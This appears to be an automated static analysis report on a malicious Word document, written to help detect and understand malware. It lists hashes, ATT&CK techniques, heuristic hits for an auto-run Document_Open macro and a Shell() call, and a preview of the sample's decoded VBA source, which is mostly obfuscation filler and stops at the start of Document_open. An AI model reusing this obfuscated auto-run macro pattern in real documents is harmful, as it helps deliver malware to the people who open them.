Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c481da6c19c04e14…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 156.6 KB
Created: 2018-07-23 11:08:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 207f4f1756dda03f7089278d3390a28b
SHA-1: bf03cd259102424b9cb406fe2ef3cdaf9d463141
SHA-256: c481da6c19c04e148954cf541b2819b70ea1108ddb9916553a0eb266f7694ab3
Risk Score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The file is a Microsoft Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call in the VBA code, a function commonly used to execute arbitrary commands. The presence of a 'Document_Open' macro indicates the code is designed to run automatically when the document is opened. Although the VBA code is heavily obfuscated, together these indicators strongly suggest the document's purpose is to download and execute a secondary payload, consistent with common malware delivery techniques.

Heuristics (5)

  • ClamAV: Doc.Malware.Valyria-10026440-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10026440-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body; this is the standard OOXML DrawingML namespace identifier)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 29534 bytes
SHA-256: 1bf68875b137a1cc844bf647b923b5e0afc8f0781c79ffadbe68c97eef35856d

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "mVMLiwfHzQGmN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function DqGrcBsalmcUp()
On Error Resume Next
   If HlPMG Xor 11 Then
      ElseIf OfOpP Eqv dKPwb Then
      If dWETnc = lBSAVo Then
         GEzZJ = Oct(STdfwX * 41517)
      End If
   End If
   If dBprN Xor 11 Then
      ElseIf JEozm Eqv UAvftB Then
      If KZNpmr = KtZXQG Then
         RXRLd = Oct(rzzIbW * 4692)
      End If
   End If
   If Truqnu Xor 11 Then
      ElseIf ChnwNp Eqv LznMI Then
      If DHznv = hVYKml Then
         fHNTYB = Oct(AJrjzW * 52570)
      End If
   End If
   If hACWV Xor 11 Then
      ElseIf uQLDA Eqv OPfRhj Then
      If DciTP = INaEOP Then
         dqMYUt = Oct(QWHFIc * 78715)
      End If
   End If
   If SDlhBr Xor 11 Then
      ElseIf ZUYTz Eqv QiANH Then
      If pimowS = NEKYwZ Then
         rLLNl = Oct(woQlTI * 4604)
      End If
   End If
End Function
Private Function UQjFdMtH()
On Error Resume Next
   If iKYVLU <= GqVAr Then
      Set kLtVb = PJTpTl
      cBNIv = (lWHuQ * aOIqz - zzfYku + qqkXL + 41045 - jmsFs)
   End If
   If tFsdQd <= BiGTT Then
      Set VltERT = ERAzvZ
      UnWCw = (WEunu * QwpIi - rcjzs + oYoVbF + 86446 - rSwNLD)
   End If
   If FIijw Xor 11 Then
      ElseIf RVQivN Eqv fGJHRd Then
      If kzCrO = lDlFoa Then
         jQwqSw = Oct(tIwojS * 76101)
      End If
   End If
   If MUdWBK Xor 11 Then
      ElseIf JMziPK Eqv XtPQp Then
      If XiZQp = EZBuU Then
         iMWff = Oct(fmnSq * 97927)
      End If
   End If
   If WRrGJ <= DzPIVu Then
      Set zbWvh = ZbAco
      NczAbw = (joFSFl * rVrFSj - ctrZSi + uaWoDM + 91927 - FwnMv)
   End If
End Function
Private Function YSTjndVYH()
On Error Resume Next
   If ADPCwX Xor 11 Then
      ElseIf iznrGt Eqv QRDNo Then
      If QJXBYV = uIRXLz Then
         zhnLsi = Oct(ofPNp * 88771)
      End If
   End If
   If flIGO Xor 11 Then
      ElseIf VKjKBj Eqv GWWoiL Then
      If utzfm = tYsjY Then
         ioqwB = Oct(OModO * 97741)
      End If
   End If
   If ttFjWc Xor 11 Then
      ElseIf jNidpz Eqv jPjHT Then
      If iirVF = cdHnia Then
         wPXRb = Oct(wFAahO * 86621)
      End If
   End If
   If wrcAmL Xor 11 Then
      ElseIf NEqBc Eqv GCfLs Then
      If RamjQS = CDQKnQ Then
         sWVGC = Oct(uIDJn * 12894)
      End If
   End If
   If tjFocE Xor 11 Then
      ElseIf LLHLir Eqv AwuDk Then
      If MjhZI = iJXdw Then
         nwJUK = Oct(KMcjK * 25732)
      End If
   End If
   If zzhib Xor 11 Then
      ElseIf NPCki Eqv zOYZvC Then
      If BKIwEi = MiDJG Then
         QNiIG = Oct(zlkAV * 64745)
      End If
   End If
   If CLdaX Xor 11 Then
      ElseIf NBUSF Eqv CnmZGV Then
      If dHTOq = QSwlCO Then
         GIWdCF = Oct(nwMLwT * 46038)
      End If
   End If
End Function
Private Function wrzHrQbvhRSf()
On Error Resume Next
   If sIzRMo Xor 11 Then
      ElseIf LVLEh Eqv wIrdQJ Then
      If IBTYu = FrPnK Then
         OVqLd = Oct(ZKnNj * 88657)
      End If
   End If
   If nCNhD Xor 11 Then
      ElseIf ZalrpZ Eqv Ljjwh Then
      If DSIHw = Hrzcu Then
         ZhVNC = Oct(ikUbnk * 98644)
      End If
   End If
   If OPoWC Xor 11 Then
      ElseIf scGLwP Eqv FDCMMb Then
      If mpHnU = dPBjzl Then
         YnwHK = Oct(pjfTz * 18218)
      End If
   End If
   If zNaHR Xor 11 Then
      ElseIf toGiuQ Eqv vwZwr Then
      If PsAzj = Nwjbi Then
         IaKId = Oct(UcVjt * 29164)
      End If
   End If
   If zpbolu Xor 11 Then
      ElseIf cSQBIa Eqv DYTBSF Then
      If oUQkE = jUanl Then
         KZBFvG = Oct(AVYjF * 67510)
      End If
   End If
End Function
Private Sub Document_open()
On Error Resume Next
   If ltMnWY Xor iCwVIY Then
      For BkhpY = 22 To Jqsfr
         kzNCb = 74081 * jwNaQ + dFUmZ + sImaK - jqihuB - vAocVz + jAobo - QluCp / 7684 / WzNwX / 6199 - rva
... (truncated)